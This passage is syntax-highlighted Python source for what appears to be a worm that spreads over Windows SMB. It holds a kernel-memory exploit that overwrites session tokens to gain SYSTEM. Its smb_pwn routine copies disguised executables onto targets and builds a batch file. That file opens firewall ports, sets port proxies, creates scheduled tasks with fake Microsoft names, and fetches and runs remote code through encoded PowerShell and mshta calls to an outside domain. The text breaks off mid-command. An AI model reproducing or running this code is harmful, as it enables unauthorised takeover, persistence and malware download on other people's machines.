        <span class="n">fakeUserAndGroups</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_FMT'</span><span class="p">]</span> <span class="o">*</span> <span class="mi">2</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">attr</span><span class="p">)</span>
        <span class="n">addr</span> <span class="o">+=</span> <span class="nb">len</span><span class="p">(</span><span class="n">sid</span><span class="p">)</span>

    <span class="n">fakeUserAndGroups</span> <span class="o">+=</span> <span class="p">(</span><span class="s">''</span><span class="p">).</span><span class="n">join</span><span class="p">(</span><span class="n">sids</span><span class="p">[:</span><span class="n">fakeUserAndGroupCount</span><span class="p">])</span>
    <span class="k">return</span> <span class="p">(</span><span class="n">fakeUserAndGroupCount</span><span class="p">,</span> <span class="n">fakeUserAndGroups</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">exploit</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">pipe_name</span><span class="p">,</span> <span class="n">USERNAME</span><span class="p">,</span> <span class="n">PASSWORD</span><span class="p">,</span> <span class="n">tg</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">MYSMB</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">get_socket</span><span class="p">().</span><span class="n">setsockopt</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">IPPROTO_TCP</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">TCP_NODELAY</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
    <span class="n">info</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">USERNAME</span><span class="p">,</span> <span class="n">PASSWORD</span><span class="p">,</span> <span class="n">maxBufferSize</span><span class="o">=</span><span class="mi">4356</span><span class="p">)</span>
    <span class="n">server_os</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_server_os</span><span class="p">()</span>
    <span class="k">print</span> <span class="s">'Target OS: '</span> <span class="o">+</span> <span class="n">server_os</span>
    <span class="k">if</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows 7 '</span><span class="p">)</span> <span class="ow">or</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Server 2008 R2'</span><span class="p">):</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'WIN7'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'method'</span><span class="p">]</span> <span class="o">=</span> <span class="n">exploit_matched_pairs</span>
    <span class="k">elif</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows 8'</span><span class="p">)</span> <span class="ow">or</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Server 2012 '</span><span class="p">)</span> <span class="ow">or</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Server 2016 '</span><span class="p">)</span> <span class="ow">or</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows 10'</span><span class="p">)</span> <span class="ow">or</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows RT 9200'</span><span class="p">):</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'WIN8'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'method'</span><span class="p">]</span> <span class="o">=</span> <span class="n">exploit_matched_pairs</span>
    <span class="k">elif</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Server (R) 2008'</span><span class="p">)</span> <span class="ow">or</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Vista'</span><span class="p">):</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'WIN7'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'method'</span><span class="p">]</span> <span class="o">=</span> <span class="n">exploit_fish_barrel</span>
    <span class="k">elif</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Server 2003 '</span><span class="p">):</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'WIN2K3'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'method'</span><span class="p">]</span> <span class="o">=</span> <span class="n">exploit_fish_barrel</span>
    <span class="k">elif</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows 5.1'</span><span class="p">):</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'WINXP'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'x86'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'method'</span><span class="p">]</span> <span class="o">=</span> <span class="n">exploit_fish_barrel</span>
    <span class="k">elif</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows XP '</span><span class="p">):</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'WINXP'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'x64'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'method'</span><span class="p">]</span> <span class="o">=</span> <span class="n">exploit_fish_barrel</span>
    <span class="k">elif</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows 5.0'</span><span class="p">):</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'WIN2K'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'x86'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'method'</span><span class="p">]</span> <span class="o">=</span> <span class="n">exploit_fish_barrel</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'This exploit does not support this target'</span>
    <span class="k">if</span> <span class="n">pipe_name</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">pipe_name</span> <span class="o">=</span> <span class="n">find_named_pipe</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">pipe_name</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">'Not found accessible named pipe'</span>
            <span class="k">return</span> <span class="bp">False</span>
        <span class="k">print</span> <span class="s">'Using named pipe: '</span> <span class="o">+</span> <span class="n">pipe_name</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">info</span><span class="p">[</span><span class="s">'method'</span><span class="p">](</span><span class="n">conn</span><span class="p">,</span> <span class="n">pipe_name</span><span class="p">,</span> <span class="n">info</span><span class="p">):</span>
        <span class="k">return</span> <span class="bp">False</span>
    <span class="n">fmt</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_FMT'</span><span class="p">]</span>
    <span class="k">print</span> <span class="s">'make this SMB session to be SYSTEM'</span>
    <span class="n">write_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'session'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'SESSION_ISNULL_OFFSET'</span><span class="p">],</span> <span class="s">'</span><span class="se">\x00\x01</span><span class="s">'</span><span class="p">)</span>
    <span class="n">sessionData</span> <span class="o">=</span> <span class="n">read_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'session'</span><span class="p">],</span> <span class="mi">256</span><span class="p">)</span>
    <span class="n">secCtxAddr</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span><span class="p">,</span> <span class="n">sessionData</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'SESSION_SECCTX_OFFSET'</span><span class="p">])[</span><span class="mi">0</span><span class="p">]</span>
    <span class="k">if</span> <span class="s">'PCTXTHANDLE_TOKEN_OFFSET'</span> <span class="ow">in</span> <span class="n">info</span><span class="p">:</span>
        <span class="k">if</span> <span class="s">'SECCTX_PCTXTHANDLE_OFFSET'</span> <span class="ow">in</span> <span class="n">info</span><span class="p">:</span>
            <span class="n">pctxtDataInfo</span> <span class="o">=</span> <span class="n">read_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">secCtxAddr</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'SECCTX_PCTXTHANDLE_OFFSET'</span><span class="p">],</span> <span class="mi">8</span><span class="p">)</span>
            <span class="n">pctxtDataAddr</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span><span class="p">,</span> <span class="n">pctxtDataInfo</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">pctxtDataAddr</span> <span class="o">=</span> <span class="n">secCtxAddr</span>
        <span class="n">tokenAddrInfo</span> <span class="o">=</span> <span class="n">read_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">pctxtDataAddr</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'PCTXTHANDLE_TOKEN_OFFSET'</span><span class="p">],</span> <span class="mi">8</span><span class="p">)</span>
        <span class="n">tokenAddr</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span><span class="p">,</span> <span class="n">tokenAddrInfo</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
        <span class="k">print</span> <span class="p">(</span><span class="s">'current TOKEN addr: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">tokenAddr</span><span class="p">)</span>
        <span class="n">tokenData</span> <span class="o">=</span> <span class="n">read_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">tokenAddr</span><span class="p">,</span> <span class="mi">64</span> <span class="o">*</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_SIZE'</span><span class="p">])</span>
        <span class="n">userAndGroupsAddr</span><span class="p">,</span> <span class="n">userAndGroupCount</span><span class="p">,</span> <span class="n">userAndGroupsAddrOffset</span><span class="p">,</span> <span class="n">userAndGroupCountOffset</span> <span class="o">=</span> <span class="n">get_group_data_from_token</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="n">tokenData</span><span class="p">)</span>
        <span class="k">print</span> <span class="s">'overwriting token UserAndGroups'</span>
        <span class="n">fakeUserAndGroupCount</span><span class="p">,</span> <span class="n">fakeUserAndGroups</span> <span class="o">=</span> <span class="n">create_fake_SYSTEM_UserAndGroups</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">userAndGroupCount</span><span class="p">,</span> <span class="n">userAndGroupsAddr</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">fakeUserAndGroupCount</span> <span class="o">!=</span> <span class="n">userAndGroupCount</span><span class="p">:</span>
            <span class="n">write_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">tokenAddr</span> <span class="o">+</span> <span class="n">userAndGroupCountOffset</span><span class="p">,</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="n">fakeUserAndGroupCount</span><span class="p">))</span>
        <span class="n">write_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">userAndGroupsAddr</span><span class="p">,</span> <span class="n">fakeUserAndGroups</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">secCtxData</span> <span class="o">=</span> <span class="n">read_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">secCtxAddr</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'SECCTX_SIZE'</span><span class="p">])</span>
        <span class="k">print</span> <span class="s">'overwriting session security context'</span>
        <span class="n">write_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">secCtxAddr</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'FAKE_SECCTX'</span><span class="p">])</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">smb_pwn</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">],</span> <span class="n">tg</span><span class="p">)</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>

    <span class="k">if</span> <span class="s">'PCTXTHANDLE_TOKEN_OFFSET'</span> <span class="ow">in</span> <span class="n">info</span><span class="p">:</span>
        <span class="n">userAndGroupsOffset</span> <span class="o">=</span> <span class="n">userAndGroupsAddr</span> <span class="o">-</span> <span class="n">tokenAddr</span>
        <span class="n">write_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">userAndGroupsAddr</span><span class="p">,</span> <span class="n">tokenData</span><span class="p">[</span><span class="n">userAndGroupsOffset</span><span class="p">:</span><span class="n">userAndGroupsOffset</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">fakeUserAndGroups</span><span class="p">)])</span>
        <span class="k">if</span> <span class="n">fakeUserAndGroupCount</span> <span class="o">!=</span> <span class="n">userAndGroupCount</span><span class="p">:</span>
            <span class="n">write_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">tokenAddr</span> <span class="o">+</span> <span class="n">userAndGroupCountOffset</span><span class="p">,</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="n">userAndGroupCount</span><span class="p">))</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">write_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">secCtxAddr</span><span class="p">,</span> <span class="n">secCtxData</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">disconnect_tree</span><span class="p">(</span><span class="n">conn</span><span class="p">.</span><span class="n">get_tid</span><span class="p">())</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">logoff</span><span class="p">()</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">get_socket</span><span class="p">().</span><span class="n">close</span><span class="p">()</span>
    <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
    <span class="k">return</span> <span class="bp">True</span>


<span class="k">def</span> <span class="nf">validate_token_offset</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="n">tokenData</span><span class="p">,</span> <span class="n">userAndGroupCountOffset</span><span class="p">,</span> <span class="n">userAndGroupsAddrOffset</span><span class="p">):</span>
    <span class="n">userAndGroupCount</span><span class="p">,</span> <span class="n">RestrictedSidCount</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;II'</span><span class="p">,</span> <span class="n">tokenData</span><span class="p">,</span> <span class="n">userAndGroupCountOffset</span><span class="p">)</span>
    <span class="n">userAndGroupsAddr</span><span class="p">,</span> <span class="n">RestrictedSids</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_FMT'</span><span class="p">]</span> <span class="o">*</span> <span class="mi">2</span><span class="p">,</span> <span class="n">tokenData</span><span class="p">,</span> <span class="n">userAndGroupsAddrOffset</span><span class="p">)</span>
    <span class="n">success</span> <span class="o">=</span> <span class="bp">True</span>
    <span class="k">if</span> <span class="n">RestrictedSidCount</span> <span class="o">!=</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">RestrictedSids</span> <span class="o">!=</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">userAndGroupCount</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">userAndGroupsAddr</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!'</span>
        <span class="k">print</span> <span class="p">(</span><span class="s">'RestrictedSids: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">RestrictedSids</span><span class="p">)</span>
        <span class="k">print</span> <span class="p">(</span><span class="s">'RestrictedSidCount: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">RestrictedSidCount</span><span class="p">)</span>
        <span class="n">success</span> <span class="o">=</span> <span class="bp">False</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'userAndGroupCount: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">userAndGroupCount</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'userAndGroupsAddr: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">userAndGroupsAddr</span><span class="p">)</span>
    <span class="k">return</span> <span class="p">(</span><span class="n">success</span><span class="p">,</span> <span class="n">userAndGroupCount</span><span class="p">,</span> <span class="n">userAndGroupsAddr</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">get_group_data_from_token</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="n">tokenData</span><span class="p">):</span>
    <span class="n">userAndGroupCountOffset</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'TOKEN_USER_GROUP_CNT_OFFSET'</span><span class="p">]</span>
    <span class="n">userAndGroupsAddrOffset</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'TOKEN_USER_GROUP_ADDR_OFFSET'</span><span class="p">]</span>
    <span class="n">success</span><span class="p">,</span> <span class="n">userAndGroupCount</span><span class="p">,</span> <span class="n">userAndGroupsAddr</span> <span class="o">=</span> <span class="n">validate_token_offset</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="n">tokenData</span><span class="p">,</span> <span class="n">userAndGroupCountOffset</span><span class="p">,</span> <span class="n">userAndGroupsAddrOffset</span><span class="p">)</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">success</span> <span class="ow">and</span> <span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]</span> <span class="o">==</span> <span class="s">'WINXP'</span> <span class="ow">and</span> <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]</span> <span class="o">==</span> <span class="s">'x86'</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround'</span>
        <span class="n">userAndGroupCountOffset</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'</span><span class="p">]</span>
        <span class="n">userAndGroupsAddrOffset</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'</span><span class="p">]</span>
        <span class="n">success</span><span class="p">,</span> <span class="n">userAndGroupCount</span><span class="p">,</span> <span class="n">userAndGroupsAddr</span> <span class="o">=</span> <span class="n">validate_token_offset</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="n">tokenData</span><span class="p">,</span> <span class="n">userAndGroupCountOffset</span><span class="p">,</span> <span class="n">userAndGroupsAddrOffset</span><span class="p">)</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">success</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'Bad TOKEN_USER_GROUP offsets. Abort &gt; BSOD'</span>
    <span class="k">return</span> <span class="p">(</span>
     <span class="n">userAndGroupsAddr</span><span class="p">,</span> <span class="n">userAndGroupCount</span><span class="p">,</span> <span class="n">userAndGroupsAddrOffset</span><span class="p">,</span> <span class="n">userAndGroupCountOffset</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">smb_pwn</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">arch</span><span class="p">,</span> <span class="n">tg</span><span class="p">):</span>
    <span class="n">ee</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">eb</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">calc.exe'</span>
    <span class="n">smbConn</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_smbconnection</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/system32/svhost.exe'</span><span class="p">):</span>
        <span class="n">eb</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">svhost.exe'</span>
    <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/SysWOW64/svhost.exe'</span><span class="p">):</span>
        <span class="n">eb</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">SysWOW64</span><span class="se">\\</span><span class="s">svhost.exe'</span>
    <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/system32/drivers/svchost.exe'</span><span class="p">):</span>
        <span class="n">eb</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">drivers</span><span class="se">\\</span><span class="s">svchost.exe'</span>
    <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/SysWOW64/drivers/svchost.exe'</span><span class="p">):</span>
        <span class="n">eb</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">SysWOW64</span><span class="se">\\</span><span class="s">drivers</span><span class="se">\\</span><span class="s">svchost.exe'</span>
    <span class="n">service_exec</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="s">'cmd /c net share c$=c:'</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">tg</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
        <span class="n">smb_send_file</span><span class="p">(</span><span class="n">smbConn</span><span class="p">,</span> <span class="n">eb</span><span class="p">,</span> <span class="s">'c'</span><span class="p">,</span> <span class="s">'/installed2.exe'</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">smb_send_file</span><span class="p">(</span><span class="n">smbConn</span><span class="p">,</span> <span class="n">eb</span><span class="p">,</span> <span class="s">'c'</span><span class="p">,</span> <span class="s">'/installed.exe'</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/temp/svvhost.exe'</span><span class="p">):</span>
        <span class="n">ee</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svvhost.exe'</span>
    <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/temp/svchost.exe'</span><span class="p">):</span>
        <span class="n">ee</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svchost.exe'</span>
    <span class="k">if</span> <span class="s">'.exe'</span> <span class="ow">in</span> <span class="n">ee</span><span class="p">:</span>
        <span class="n">smb_send_file</span><span class="p">(</span><span class="n">smbConn</span><span class="p">,</span> <span class="n">ee</span><span class="p">,</span> <span class="s">'c'</span><span class="p">,</span> <span class="s">'/windows/temp/svchost.exe'</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'no eb**************************'</span>
    <span class="k">if</span> <span class="n">tg</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
        <span class="n">bat</span> <span class="o">=</span> <span class="s">'cmd /c c:</span><span class="se">\\</span><span class="s">installed2.exe&amp;c:</span><span class="se">\\</span><span class="s">installed2.exe&amp;echo c:</span><span class="se">\\</span><span class="s">installed2.exe &gt;c:/windows/temp/p.bat&amp;echo c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svchost.exe &gt;&gt;c:/windows/temp/p.bat&amp;echo netsh interface ipv6 install &gt;&gt;c:/windows/temp/p.bat &amp;echo netsh firewall add portopening tcp 65532 DNS2  &gt;&gt;c:/windows/temp/p.bat&amp;echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 &gt;&gt;c:/windows/temp/p.bat&amp;echo netsh firewall add portopening tcp 65531 DNSS2  &gt;&gt;c:/windows/temp/p.bat&amp;echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 &gt;&gt;c:/windows/temp/p.bat&amp;echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "</span><span class="se">\\</span><span class="s">Microsoft</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F) else start /b sc start Schedule^&amp;ping localhost^&amp;sc query Schedule^|findstr RUNNING^&amp;^&amp;^(schtasks /delete /TN Autocheck /f^&amp;schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"^&amp;schtasks /run /TN Autocheck^) &gt;&gt;c:/windows/temp/p.bat&amp;echo net start Ddriver &gt;&gt;c:/windows/temp/p.bat&amp;echo for /f  %%i in (</span><span class="se">\'</span><span class="s">tasklist ^^^| find /c /i "cmd.exe"</span><span class="se">\'</span><span class="s">^) do set s=%%i &gt;&gt;c:/windows/temp/p.bat&amp;echo if %s% gtr 10 (shutdown /r) &gt;&gt;c:/windows/temp/p.bat&amp;echo net user k8h3d /del &gt;&gt;c:/windows/temp/p.bat&amp;echo del c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">p.bat&gt;&gt;c:/windows/temp/p.bat&amp;cmd.exe /c c:/windows/temp/p.bat'</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">bat</span> <span class="o">=</span> <span class="s">'cmd /c c:</span><span class="se">\\</span><span class="s">installed.exe&amp;c:</span><span class="se">\\</span><span class="s">installed.exe&amp;echo c:</span><span class="se">\\</span><span class="s">installed.exe &gt;c:/windows/temp/p.bat&amp;echo c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svchost.exe &gt;&gt;c:/windows/temp/p.bat&amp;echo netsh interface ipv6 install &gt;&gt;c:/windows/temp/p.bat &amp;echo netsh firewall add portopening tcp 65532 DNS2  &gt;&gt;c:/windows/temp/p.bat&amp;echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 &gt;&gt;c:/windows/temp/p.bat&amp;echo netsh firewall add portopening tcp 65531 DNSS2  &gt;&gt;c:/windows/temp/p.bat&amp;echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 &gt;&gt;c:/windows/temp/p.bat&amp;echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "</span><span class="se">\\</span><span class="s">Microsoft</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">Bluetooths" /tr "powershell -ep bypass -e 